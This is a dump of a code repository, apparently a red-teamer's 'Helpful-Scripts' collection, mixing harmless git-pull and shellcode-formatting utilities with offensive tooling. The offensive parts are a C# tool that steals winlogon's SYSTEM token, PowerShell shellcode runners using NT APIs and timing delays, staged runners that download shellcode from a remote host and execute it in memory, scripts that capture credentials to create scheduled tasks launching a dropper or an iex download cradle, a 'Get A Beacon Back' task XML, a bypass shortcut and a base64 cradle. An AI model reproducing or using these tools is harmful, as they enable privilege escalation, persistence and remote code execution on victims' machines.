├── C# Token Duplicator ├── README.md └── tokendupC#.cs ├── Git Pull All Directories In Opt ├── README.md └── git_pull.sh ├── Git Pull Recursively In Windows ├── GitPull.ps1 └── README.md ├── Linux FileServer Creator ├── FileShare.sh └── README.md ├── Powershell Create LNK File └── CreateLNK.ps1 ├── Powershell Shellcode Runner Using NTAPIS └── Powershell Shellcode Runner.ps1 ├── README.md ├── Raw Shellcode To C++ ├── README.md └── raw2C.py ├── Raw Shellcode To Powershell ├── README.md └── raw_2_PSH.py ├── Relaying PowerShell Creds To Scheduled Tasks ├── Calling_An_EXE.ps1 └── Fileless_With_PS_Shellcode_Runner.ps1 ├── Staged Powershell Shellcode Runner From A File ├── README.md └── Staged_PS_Runner_From_File.ps1 ├── Staged Powershell Shellcode Runner Using NT APIs ├── README.md └── Staged_PS_Runner.ps1 ├── String To Pointer ├── README.md └── StringToPointer.sh ├── Task XML ├── README.md └── UserTask.xml └── Windows Base64 Oneliner └── WindowsBase64.ps1 /C# Token Duplicator/README.md: -------------------------------------------------------------------------------- 1 | Token Duplicator that can be used with Execute-Assembly in CS or Havoc. Mainly based on the code in this repo: https://github.com/yusufqk/SystemToken 2 | 3 | Thanks to @icyguider for pointing me in the right direction on this. 4 | 5 | Compile with Mono-Devel on Linux. 6 | 7 | mcs tokenduplicatorC#.cs /out:token.exe 8 | 9 | Usage: 10 | 11 | token.exe -p PROGRAM -a "ARGS" (with quotes) 12 | 13 | Screenshot 2024-03-01 at 11 53 00 AM 14 | -------------------------------------------------------------------------------- /C# Token Duplicator/tokendupC#.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using System.Threading; 5 | 6 | class TokenTheft { 7 | [DllImport("advapi32.dll", SetLastError = true)] 8 | static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle); 9 | 10 | [DllImport("advapi32.dll", SetLastError = true)] 11 | static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken); 12 | 13 | [DllImport("kernel32.dll", SetLastError = true)] 14 | static extern bool CloseHandle(IntPtr hObject); 15 | 16 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] 17 | static extern bool CreateProcessWithTokenW(IntPtr hToken, uint dwLogonFlags, string lpApplicationName, string lpCommandLine, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 18 | 19 | const int TOKEN_QUERY = 0x0008; 20 | const uint TOKEN_DUPLICATE = 0x0002; 21 | const uint TOKEN_ALL_ACCESS = 0xF01FF; 22 | 23 | const uint TokenPrimary = 1; 24 | const uint SecurityImpersonation = 2; 25 | 26 | [StructLayout(LayoutKind.Sequential)] 27 | public struct PROCESS_INFORMATION { 28 | public IntPtr hProcess; 29 | public IntPtr hThread; 30 | public uint dwProcessId; 31 | public uint dwThreadId; 32 | } 33 | 34 | [StructLayout(LayoutKind.Sequential)] 35 | public struct STARTUPINFO { 36 | public Int32 cb; 37 | public string lpReserved; 38 | public string lpDesktop; 39 | public string lpTitle; 40 | public Int32 dwX; 41 | public Int32 dwY; 42 | public Int32 dwXSize; 43 | public Int32 dwYSize; 44 | public Int32 dwXCountChars; 45 | public Int32 dwYCountChars; 46 | public Int32 dwFillAttribute; 47 | public Int32 dwFlags; 48 | public Int16 wShowWindow; 49 | public Int16 cbReserved2; 50 | public IntPtr lpReserved2; 51 | public IntPtr hStdInput; 52 | public IntPtr hStdOutput; 53 | public IntPtr hStdError; 54 | } 55 | 56 | static void Main(string[] args) { 57 | string programPath = "cmd.exe"; 58 | string programArguments = ""; 59 | 60 | // Check if there are at least two arguments and the first one is "-p" 61 | if (args.Length >= 2 && args[0] == "-p") { 62 | programPath = args[1]; 63 | 64 | // Check if there are at least four arguments and the third one is "-a" 65 | if (args.Length >= 4 && args[2] == "-a") { 66 | // Concatenate the arguments from index 3 onwards 67 | programArguments = string.Join(" ", args, 3, args.Length - 3); 68 | } 69 | } 70 | 71 | // Now you have the program path and arguments, proceed with your logic 72 | uint processId = FindWinlogonProcessID(); 73 | if (processId == 0) { 74 | Console.WriteLine("Failed to find the winlogon process."); 75 | return; 76 | } 77 | 78 | IntPtr hProcess = Process.GetProcessById((int)processId).Handle; 79 | IntPtr hToken; 80 | 81 | if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_QUERY, out hToken)) { 82 | Console.WriteLine("Failed to open process token. Error code: " + Marshal.GetLastWin32Error()); 83 | return; 84 | } 85 | 86 | IntPtr hDupToken; 87 | if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, IntPtr.Zero, SecurityImpersonation, TokenPrimary, out hDupToken)) { 88 | Console.WriteLine("Failed to duplicate token. Error code: " + Marshal.GetLastWin32Error()); 89 | CloseHandle(hToken); 90 | return; 91 | } 92 | 93 | // Prepare process startup information 94 | STARTUPINFO si = new STARTUPINFO(); 95 | si.cb = Marshal.SizeOf(si); 96 | PROCESS_INFORMATION pi; 97 | 98 | // Concatenate the program path and arguments 99 | string commandLine = $"\"{programPath}\" {programArguments}"; 100 | 101 | // Print out the constructed command line 102 | Console.WriteLine("Command line: " + commandLine); 103 | 104 | // Create process with the duplicated token 105 | if (!CreateProcessWithTokenW(hDupToken, 0, null, commandLine, 0, IntPtr.Zero, null, ref si, out pi)) { 106 | Console.WriteLine("Failed to create process with token. Error code: " + Marshal.GetLastWin32Error()); 107 | CloseHandle(hToken); 108 | CloseHandle(hDupToken); 109 | return; 110 | } 111 | 112 | // Wait for the process to exit 113 | Process process = Process.GetProcessById((int)pi.dwProcessId); 114 | process.WaitForExit(); 115 | 116 | // Sleep for 5 seconds to keep the console window open 117 | Thread.Sleep(5000); 118 | 119 | Console.WriteLine("Process spawned using token of SYSTEM."); 120 | CloseHandle(hToken); 121 | CloseHandle(hDupToken); 122 | } 123 | 124 | static uint FindWinlogonProcessID() { 125 | Process[] processes = Process.GetProcessesByName("winlogon"); 126 | foreach (Process p in processes) { 127 | if (p.SessionId == 1) { 128 | return (uint)p.Id; 129 | } 130 | } 131 | return 0; 132 | } 133 | } 134 | -------------------------------------------------------------------------------- /Git Pull All Directories In Opt/README.md: -------------------------------------------------------------------------------- 1 | A simple script to recursively git pull all directories in /opt (or any designated directory). 2 | -------------------------------------------------------------------------------- /Git Pull All Directories In Opt/git_pull.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Define the directory where you want to perform the git pull 4 | directory="/opt" 5 | 6 | # Function to perform git pull recursively 7 | git_pull_recursive() { 8 | local dir="$1" 9 | # Loop through each item in the directory 10 | for item in "$dir"/*; do 11 | # Check if the item is a directory 12 | if [ -d "$item" ]; then 13 | # Check if the directory is a git repository 14 | if [ -d "$item/.git" ]; then 15 | echo "Pulling changes in $item" 16 | # Change to the directory and perform a git pull 17 | cd "$item" || exit 18 | git pull 19 | else 20 | echo "Checking subdirectory: $item" 21 | # Recursively call the function for subdirectories 22 | git_pull_recursive "$item" 23 | fi 24 | fi 25 | done 26 | } 27 | 28 | # Check if the directory exists 29 | if [ -d "$directory" ]; then 30 | # Call the function to start the recursive git pull 31 | git_pull_recursive "$directory" 32 | else 33 | echo "Directory $directory does not exist" 34 | exit 1 35 | fi 36 | -------------------------------------------------------------------------------- /Git Pull Recursively In Windows/GitPull.ps1: -------------------------------------------------------------------------------- 1 | # Prompt the user for the directory to start in 2 | $directory = Read-Host "Enter the directory to start in" 3 | 4 | # Function to perform git pull recursively 5 | function GitPullRecursive { 6 | param ( 7 | [string]$dir 8 | ) 9 | 10 | # Loop through each item in the directory 11 | $items = Get-ChildItem -Path $dir 12 | foreach ($item in $items) { 13 | # Check if the item is a directory 14 | if ($item.PSIsContainer) { 15 | # Check if the directory is a git repository 16 | if (Test-Path "$($item.FullName)\.git" -PathType Container) { 17 | Write-Output "Pulling changes in $($item.FullName)" 18 | # Change to the directory and perform a git pull 19 | Set-Location -Path $item.FullName 20 | git pull 21 | } 22 | else { 23 | Write-Output "Checking subdirectory: $($item.FullName)" 24 | # Recursively call the function for subdirectories 25 | GitPullRecursive $item.FullName 26 | } 27 | } 28 | } 29 | } 30 | 31 | # Check if the directory exists 32 | if (Test-Path $directory -PathType Container) { 33 | # Call the function to start the recursive git pull 34 | GitPullRecursive $directory 35 | } 36 | else { 37 | Write-Output "Directory $directory does not exist" 38 | exit 1 39 | } 40 | -------------------------------------------------------------------------------- /Git Pull Recursively In Windows/README.md: -------------------------------------------------------------------------------- 1 | A Powershell script to git pull recursively from a designated directory. 2 | -------------------------------------------------------------------------------- /Linux FileServer Creator/FileShare.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Update the package list 4 | sudo apt update 5 | 6 | # Install Samba 7 | sudo apt install samba openssh-server git net-tools -y 8 | 9 | # Create a directory to share 10 | sudo mkdir -p /srv/fileshare 11 | 12 | # Set permissions on the shared directory 13 | sudo chmod -R 777 /srv/fileshare 14 | 15 | # Backup the original Samba configuration file 16 | sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.backup 17 | 18 | # Create a new Samba configuration file 19 | sudo bash -c 'cat < /etc/samba/smb.conf 20 | [global] 21 | workgroup = WORKGROUP 22 | server string = File Share Server 23 | security = user 24 | 25 | [fileshare] 26 | comment = Shared Folder 27 | path = /srv/fileshare 28 | browseable = yes 29 | read only = no 30 | guest ok = yes 31 | create mask = 0777 32 | directory mask = 0777 33 | EOF' 34 | 35 | echo "0 1 * * * /usr/bin/apt update -y && /usr/bin/apt upgrade -y" | sudo crontab -u root - 36 | echo "0 3 * * * /sbin/shutdown -r now" | sudo crontab -u root - 37 | 38 | # Enable Services 39 | systemctl set-default multi-user.target 40 | sudo systemctl enable smbd 41 | sudo systemctl enable ssh 42 | reboot now 43 | -------------------------------------------------------------------------------- /Linux FileServer Creator/README.md: -------------------------------------------------------------------------------- 1 | An insecure file server build script. This is meant for a quick standalone file server where all users on the network will have full access. No OPSEC has been taken into account. Use accordingly. 2 | -------------------------------------------------------------------------------- /Powershell Create LNK File/CreateLNK.ps1: -------------------------------------------------------------------------------- 1 | $WshShell = New-Object -ComObject WScript.Shell 2 | $Shortcut = $WshShell.CreateShortcut(“C:\Users\charl\OneDrive\Desktop\fancybear.lnk”) 3 | 4 | # Set properties for the shortcut 5 | $Shortcut.TargetPath = “C:\Windows\System32\cmd.exe” 6 | $Shortcut.WorkingDirectory = “C:\Windows\System32\” 7 | $Shortcut.Description = “This is a shortcut that we need for our business.” 8 | $Shortcut.Arguments = '/c powershell -ep bypass' 9 | $Shortcut.IconLocation = ‘C:\Windows\System32\msi.dll’ 10 | $Shortcut.WindowStyle = 1 # 1 — Normal, 3 — Maximized, 7 — Minimized 11 | $Shortcut.Save() 12 | -------------------------------------------------------------------------------- /Powershell Shellcode Runner Using NTAPIS/Powershell Shellcode Runner.ps1: -------------------------------------------------------------------------------- 1 | Add-Type @" 2 | using System; 3 | using System.Runtime.InteropServices; 4 | 5 | public class NtDll { 6 | [DllImport("ntdll.dll", SetLastError = true)] 7 | public static extern int NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, uint AllocationType, uint Protect); 8 | 9 | [DllImport("ntdll.dll", SetLastError = true)] 10 | public static extern int NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, uint FreeType); 11 | 12 | [DllImport("ntdll.dll", SetLastError = true)] 13 | public static extern int NtCreateThreadEx(out IntPtr ThreadHandle, uint DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr StartAddress, IntPtr Argument, uint CreateFlags, uint ZeroBits, uint StackSize, uint MaximumStackSize, IntPtr AttributeList); 14 | 15 | [DllImport("ntdll.dll", SetLastError = true)] 16 | public static extern int NtWaitForSingleObject(IntPtr Handle, bool Alertable, IntPtr Timeout); 17 | 18 | [DllImport("ntdll.dll", SetLastError = true)] 19 | public static extern int NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, uint NewProtect, out uint OldProtect); 20 | 21 | [DllImport("ntdll.dll", SetLastError = true)] 22 | public static extern int NtDelayExecution(bool Alertable, ref long DelayInterval); 23 | 24 | [DllImport("ntdll.dll", SetLastError = true)] 25 | public static extern int ZwSetTimerResolution(uint RequestedResolution, bool Set, ref uint ActualResolution); 26 | } 27 | 28 | public class MyFunctions { 29 | private static bool once = true; 30 | 31 | public static void SleepShort(float milliseconds) { 32 | if (once) { 33 | uint actualResolution = 0; 34 | NtDll.ZwSetTimerResolution(1, true, ref actualResolution); 35 | once = false; 36 | } 37 | 38 | long interval = (long)(-1 * milliseconds * 10000.0f); 39 | NtDll.NtDelayExecution(false, ref interval); 40 | } 41 | } 42 | "@ 43 | 44 | # Add-Type block remains unchanged 45 | 46 | # Define shellcode bytes (replace SHELLCODE with your actual shellcode) 47 | [Byte[]] $buf = SHELLCODE 48 | 49 | # Calculate the size of the shellcode 50 | $size = $buf.Length 51 | 52 | # Sleep function for delay 53 | function SleepShort($milliseconds) { 54 | [MyFunctions]::SleepShort($milliseconds) 55 | } 56 | 57 | # Ensure enough delay between operations 58 | SleepShort 2000; 59 | 60 | # Allocate read-write memory using NtAllocateVirtualMemory 61 | $addr = [IntPtr]::Zero 62 | [NtDll]::NtAllocateVirtualMemory(-1, [ref]$addr, [IntPtr]::Zero, [ref]$size, 0x3000, 0x4) # AllocationType = MEM_COMMIT, Protect = PAGE_READWRITE 63 | 64 | SleepShort 2000; 65 | 66 | # Copy the shellcode to the allocated memory 67 | [Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length) 68 | 69 | SleepShort 2000; 70 | 71 | # Change the memory protection to read-execute using NtProtectVirtualMemory 72 | $oldProtect = 0 73 | [NtDll]::NtProtectVirtualMemory(-1, [ref]$addr, [ref]$size, 0x20, [ref]$oldProtect) # NewProtect = PAGE_EXECUTE_READ 74 | 75 | SleepShort 2000; 76 | 77 | # Create a new thread and execute the shellcode using NtCreateThreadEx 78 | $thandle = [IntPtr]::Zero 79 | [NtDll]::NtCreateThreadEx([ref]$thandle, 0x1FFFFF, [IntPtr]::Zero, -1, $addr, [IntPtr]::Zero, 0, 0, 0, 0, [IntPtr]::Zero) 80 | 81 | # Wait for the thread to finish using NtWaitForSingleObject 82 | [NtDll]::NtWaitForSingleObject($thandle, $false, [IntPtr]::Zero) 83 | 84 | SleepShort 2000; 85 | 86 | # Free the allocated memory using NtFreeVirtualMemory 87 | [NtDll]::NtFreeVirtualMemory(-1, [ref]$addr, [ref]$size, 0x8000) # FreeType = MEM_RELEASE 88 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Helpful scripts for daily tasks. 2 | -------------------------------------------------------------------------------- /Raw Shellcode To C++/README.md: -------------------------------------------------------------------------------- 1 | A python script to convert raw shellcode to C++ format. 2 | 3 | Screenshot 2024-02-21 at 9 39 02 AM 4 | -------------------------------------------------------------------------------- /Raw Shellcode To C++/raw2C.py: -------------------------------------------------------------------------------- 1 | def format_shellcode(input_file, output_file): 2 | with open(input_file, 'rb') as f: 3 | raw_shellcode = f.read() 4 | 5 | formatted_shellcode = ', '.join("0x{:02x}".format(byte) for byte in raw_shellcode) 6 | 7 | with open(output_file, 'w') as f: 8 | f.write(formatted_shellcode) 9 | 10 | if __name__ == "__main__": 11 | input_file = input("Enter the path to the input file containing raw shellcode: ") 12 | output_file = input("Enter the path to the output file for the formatted shellcode: ") 13 | 14 | format_shellcode(input_file, output_file) 15 | print(f"Formatted shellcode has been written to {output_file}") 16 | -------------------------------------------------------------------------------- /Raw Shellcode To Powershell /README.md: -------------------------------------------------------------------------------- 1 | A script to convert raw shellcode to Powershell format. 2 | 3 | Screenshot 2024-02-20 at 8 40 53 AM 4 | -------------------------------------------------------------------------------- /Raw Shellcode To Powershell /raw_2_PSH.py: -------------------------------------------------------------------------------- 1 | def format_shellcode(input_file, output_file): 2 | # Read the raw shellcode from the input file 3 | with open(input_file, 'rb') as f: 4 | raw_shellcode = f.read() 5 | 6 | # Convert each byte to a string representation in the format 0xXX 7 | formatted_shellcode = ",".join("0x{:02x}".format(byte) for byte in raw_shellcode) 8 | 9 | # Write the formatted shellcode to the output file 10 | with open(output_file, 'w') as f: 11 | f.write(formatted_shellcode) 12 | 13 | if __name__ == "__main__": 14 | input_file = input("Enter the path to the input file containing raw shellcode: ") 15 | output_file = input("Enter the path to the output file for the formatted shellcode: ") 16 | 17 | format_shellcode(input_file, output_file) 18 | print(f"Formatted shellcode has been written to {output_file}") 19 | -------------------------------------------------------------------------------- /Relaying PowerShell Creds To Scheduled Tasks/Calling_An_EXE.ps1: -------------------------------------------------------------------------------- 1 | # Prompt the user for credentials 2 | $credential = Get-Credential 3 | 4 | # Extract task configuration from XML 5 | $command = $xml.TaskDefinition.Command 6 | $username = $credential.UserName 7 | $password = $credential.GetNetworkCredential().Password 8 | 9 | # Define the command to create the scheduled task using schtasks.exe 10 | $command = "schtasks /create /tn GetAdmin /tr 'Path\To\Droper.exe' /sc once /st 15:00 /ru $username /rp $password" 11 | 12 | #Use below command for SYSTEM (admin beacon needed) 13 | #$command = "schtasks /create /tn GetSystem /tr 'C:\Users\user\Downloads\APCTest.exe' /sc once /st 12:05 /ru SYSTEM" 14 | 15 | # Execute the command using Invoke-Expression 16 | Invoke-Expression -Command $command 17 | -------------------------------------------------------------------------------- /Relaying PowerShell Creds To Scheduled Tasks/Fileless_With_PS_Shellcode_Runner.ps1: -------------------------------------------------------------------------------- 1 | # Prompt the user for credentials 2 | $credential = Get-Credential 3 | 4 | # Define the PowerShell command 5 | $powerShellCommand = "-exec bypass iex (New-Object System.Net.WebClient).DownloadString(''http://IP:PORT/ShellcodeRunner.ps1'')" 6 | 7 | # Extract the username and password from the credential 8 | $username = $credential.UserName 9 | $password = $credential.GetNetworkCredential().Password 10 | 11 | # Define the command to create the scheduled task using schtasks.exe 12 | $powerShellCommandEscaped = $powerShellCommand -replace "'", "''" # Escape single quotes 13 | $command = "schtasks /create /tn 'TASKNAME' /tr `"powershell.exe $powerShellCommandEscaped`" /sc once /st 11:04 /ru $username /rp $password" 14 | 15 | # Execute the command using Invoke-Expression 16 | Invoke-Expression -Command $command 17 | 18 | -------------------------------------------------------------------------------- /Staged Powershell Shellcode Runner From A File/README.md: -------------------------------------------------------------------------------- 1 | A staged Powershell shellcode runner that downloads Powershell formatted shellcode from a file and runs it in memory. You can use the Raw_2_PS.py script to format your shellcode. 2 | 3 | Screenshot 2024-02-25 at 9 17 29 AM 4 | 5 | 6 | Screenshot 2024-02-25 at 9 18 18 AM 7 | 8 | 9 | Screenshot 2024-02-25 at 9 19 15 AM 10 | 11 | 12 | Screenshot 2024-02-25 at 9 19 00 AM 13 | 14 | -------------------------------------------------------------------------------- /Staged Powershell Shellcode Runner From A File/Staged_PS_Runner_From_File.ps1: -------------------------------------------------------------------------------- 1 | # URL from which to download the shellcode file 2 | $url = "http://IP:PORT/shellcode.txt" 3 | 4 | # Download the shellcode from the URL 5 | $shellcodeText = (New-Object System.Net.WebClient).DownloadString($url) 6 | 7 | # Split the shellcode text into individual hexadecimal byte strings 8 | $hexStrings = $shellcodeText -split ',' 9 | 10 | # Parse each hexadecimal byte string and convert it to a byte array 11 | $shellcodeBytes = $hexStrings | ForEach-Object { [byte]::Parse($_.Trim().Substring(2), 'HexNumber') } 12 | 13 | # Load necessary WinAPI functions 14 | Add-Type @" 15 | using System; 16 | using System.Runtime.InteropServices; 17 | 18 | public class NtDll { 19 | [DllImport("ntdll.dll", SetLastError = true)] 20 | public static extern int NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, uint AllocationType, uint Protect); 21 | 22 | [DllImport("kernel32.dll")] 23 | public static extern IntPtr GetCurrentProcess(); 24 | 25 | [DllImport("kernel32.dll", SetLastError = true)] 26 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten); 27 | 28 | [DllImport("ntdll.dll", SetLastError = true)] 29 | public static extern int NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, uint NewProtect, out uint OldProtect); 30 | 31 | [DllImport("kernel32.dll")] 32 | public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 33 | 34 | [DllImport("kernel32.dll")] 35 | public static extern bool CloseHandle(IntPtr hObject); 36 | 37 | [DllImport("kernel32.dll")] 38 | public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds); 39 | } 40 | "@ 41 | 42 | # Allocate memory in the current process 43 | $processHandle = [NtDll]::GetCurrentProcess() 44 | $baseAddress = [IntPtr]::Zero 45 | $regionSize = [IntPtr]::new($shellcodeBytes.Length) 46 | $allocationType = 0x3000 # MEM_COMMIT | MEM_RESERVE 47 | $protect = 0x40 # PAGE_READWRITE 48 | 49 | $allocationResult = [NtDll]::NtAllocateVirtualMemory($processHandle, [ref]$baseAddress, [IntPtr]::Zero, [ref]$regionSize, $allocationType, $protect) 50 | 51 | if ($allocationResult -eq 0) { 52 | # Copy the shellcode to the allocated memory 53 | $bytesWritten = 0 54 | [NtDll]::WriteProcessMemory($processHandle, $baseAddress, $shellcodeBytes, $shellcodeBytes.Length, [ref]$bytesWritten) 55 | 56 | # Change memory protection to PAGE_EXECUTE_READ 57 | $oldProtect = 0 58 | $protect = 0x20 # PAGE_EXECUTE_READ 59 | [NtDll]::NtProtectVirtualMemory($processHandle, [ref]$baseAddress, [ref]$regionSize, $protect, [ref]$oldProtect) 60 | 61 | # Execute the shellcode by creating a new thread 62 | $threadHandle = [NtDll]::CreateThread([IntPtr]::Zero, 0, $baseAddress, [IntPtr]::Zero, 0, [IntPtr]::Zero) 63 | [NtDll]::WaitForSingleObject($threadHandle, 4000) 64 | 65 | # Cleanup 66 | [NtDll]::CloseHandle($threadHandle) 67 | } else { 68 | Write-Host "Failed to allocate memory." 69 | } 70 | Start-Sleep 3500; 71 | -------------------------------------------------------------------------------- /Staged Powershell Shellcode Runner Using NT APIs/README.md: -------------------------------------------------------------------------------- 1 | A staged Powershell shellcode runner that uses NT APIs. Simply replace the IP, Port and name of your raw shellcode file and host it. 2 | 3 | Screenshot 2024-02-25 at 8 16 13 AM 4 | 5 | Screenshot 2024-02-25 at 8 16 22 AM 6 | -------------------------------------------------------------------------------- /Staged Powershell Shellcode Runner Using NT APIs/Staged_PS_Runner.ps1: -------------------------------------------------------------------------------- 1 | Add-Type @" 2 | using System; 3 | using System.Runtime.InteropServices; 4 | using System.Net; 5 | 6 | public class NtDll { 7 | [DllImport("ntdll.dll", SetLastError = true)] 8 | public static extern int NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, uint AllocationType, uint Protect); 9 | 10 | [DllImport("ntdll.dll", SetLastError = true)] 11 | public static extern int NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, uint FreeType); 12 | 13 | [DllImport("ntdll.dll", SetLastError = true)] 14 | public static extern int NtCreateThreadEx(out IntPtr ThreadHandle, uint DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr StartAddress, IntPtr Argument, uint CreateFlags, uint ZeroBits, uint StackSize, uint MaximumStackSize, IntPtr AttributeList); 15 | 16 | [DllImport("ntdll.dll", SetLastError = true)] 17 | public static extern int NtWaitForSingleObject(IntPtr Handle, bool Alertable, IntPtr Timeout); 18 | 19 | [DllImport("ntdll.dll", SetLastError = true)] 20 | public static extern int NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, uint NewProtect, out uint OldProtect); 21 | 22 | [DllImport("ntdll.dll", SetLastError = true)] 23 | public static extern int NtDelayExecution(bool Alertable, ref long DelayInterval); 24 | 25 | [DllImport("ntdll.dll", SetLastError = true)] 26 | public static extern int ZwSetTimerResolution(uint RequestedResolution, bool Set, ref uint ActualResolution); 27 | } 28 | 29 | public class MyFunctions { 30 | private static bool once = true; 31 | 32 | public static void SleepShort(float milliseconds) { 33 | if (once) { 34 | uint actualResolution = 0; 35 | NtDll.ZwSetTimerResolution(1, true, ref actualResolution); 36 | once = false; 37 | } 38 | 39 | long interval = (long)(-1 * milliseconds * 10000.0f); 40 | NtDll.NtDelayExecution(false, ref interval); 41 | } 42 | } 43 | "@ 44 | 45 | # Define URL to download shellcode from 46 | $url = "http://IP:PORT/SHELLCODEFILE.bin" 47 | 48 | # Function to download shellcode from URL 49 | function Download-Shellcode { 50 | param($url) 51 | $webClient = New-Object System.Net.WebClient 52 | $bytes = $webClient.DownloadData($url) 53 | return $bytes 54 | } 55 | 56 | # Ensure enough delay between operations 57 | [MyFunctions]::SleepShort(2000) 58 | 59 | # Download shellcode from URL 60 | $shellcode = Download-Shellcode -url $url 61 | 62 | # Calculate the size of the shellcode 63 | $size = $shellcode.Length 64 | 65 | # Sleep function for delay 66 | function SleepShort($milliseconds) { 67 | [MyFunctions]::SleepShort($milliseconds) 68 | } 69 | 70 | # Ensure enough delay between operations 71 | SleepShort 2000 72 | 73 | # Allocate read-write memory using NtAllocateVirtualMemory 74 | $addr = [IntPtr]::Zero 75 | [NtDll]::NtAllocateVirtualMemory(-1, [ref]$addr, [IntPtr]::Zero, [ref]$size, 0x3000, 0x4) # AllocationType = MEM_COMMIT, Protect = PAGE_READWRITE 76 | 77 | SleepShort 2000 78 | 79 | # Copy the shellcode to the allocated memory 80 | [Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $addr, $shellcode.Length) 81 | 82 | SleepShort 2000 83 | 84 | # Change the memory protection to read-execute using NtProtectVirtualMemory 85 | $oldProtect = 0 86 | [NtDll]::NtProtectVirtualMemory(-1, [ref]$addr, [ref]$size, 0x20, [ref]$oldProtect) # NewProtect = PAGE_EXECUTE_READ 87 | 88 | SleepShort 2000 89 | 90 | # Create a new thread and execute the shellcode using NtCreateThreadEx 91 | $thandle = [IntPtr]::Zero 92 | [NtDll]::NtCreateThreadEx([ref]$thandle, 0x1FFFFF, [IntPtr]::Zero, -1, $addr, [IntPtr]::Zero, 0, 0, 0, 0, [IntPtr]::Zero) 93 | 94 | # Wait for the thread to finish using NtWaitForSingleObject 95 | [NtDll]::NtWaitForSingleObject($thandle, $false, [IntPtr]::Zero) 96 | 97 | SleepShort 10000 98 | 99 | # Free the allocated memory using NtFreeVirtualMemory 100 | [NtDll]::NtFreeVirtualMemory(-1, [ref]$addr, [ref]$size, 0x8000) # FreeType = MEM_RELEASE 101 | -------------------------------------------------------------------------------- /String To Pointer/README.md: -------------------------------------------------------------------------------- 1 | A handy script to convert a string (Win API) to a comma separated pointer with a randomized string as the declaration. 2 | 3 | Screenshot 2024-02-20 at 10 41 34 AM 4 | -------------------------------------------------------------------------------- /String To Pointer/StringToPointer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Prompt the user for input 4 | read -p "Enter a string: " input_string 5 | 6 | # Generate a random 4-7 character string for NtDe 7 | ntde_length=$((RANDOM % 4 + 4)) 8 | ntde=$(cat /dev/urandom | tr -dc 'a-zA-Z' | head -c $ntde_length) 9 | 10 | # Loop through each character in the input string 11 | output_array="" 12 | for ((i=0; i<${#input_string}; i++)); do 13 | # Append each character to the output array 14 | output_array+=" '${input_string:$i:1}'," 15 | done 16 | 17 | # Add a null terminator and close the array 18 | output_array+=" 0x0 };" 19 | 20 | # Print the final array declaration 21 | printf "unsigned char ${ntde}[] = {${output_array}\n" 22 | -------------------------------------------------------------------------------- /Task XML/README.md: -------------------------------------------------------------------------------- 1 | This is a user based scheduled task in XML format that can be imported via Powershell or schtasks.exe. You will need the password of the user to do this remotely. 2 | 3 | Edit the USERID field and replace with the SID of your user. 4 | 5 | ![Screenshot 2024-03-05 at 10 34 52 AM](https://github.com/assume-breach/Helpful-Scripts/assets/76174163/3a65ba53-c179-4409-8654-fa10ac336a29) 6 | -------------------------------------------------------------------------------- /Task XML/UserTask.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2024-03-03T12:14:18.1254802 4 | Microsoft 5 | Get A Beacon Back 6 | Beacon Back 7 | 8 | 9 | 10 | 2024-03-03T12:13:34 11 | true 12 | 13 | 14 | 15 | 16 | USERSID 17 | InteractiveToken 18 | LeastPrivilege 19 | 20 | 21 | 22 | IgnoreNew 23 | true 24 | true 25 | true 26 | false 27 | false 28 | 29 | PT10M 30 | PT1H 31 | true 32 | false 33 | 34 | true 35 | true 36 | false 37 | false 38 | false 39 | PT72H 40 | 7 41 | 42 | 43 | 44 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe 45 | iex(New-Object Net.WebClient).DownloadString('http://192.168.1.45:9999/runner.md') 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /Windows Base64 Oneliner/WindowsBase64.ps1: -------------------------------------------------------------------------------- 1 | $str= “iex (new-object system.net.webclient).downloadstring(‘http://LOCALIP:PORT/readme.md')" 2 | 3 | [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) 4 | --------------------------------------------------------------------------------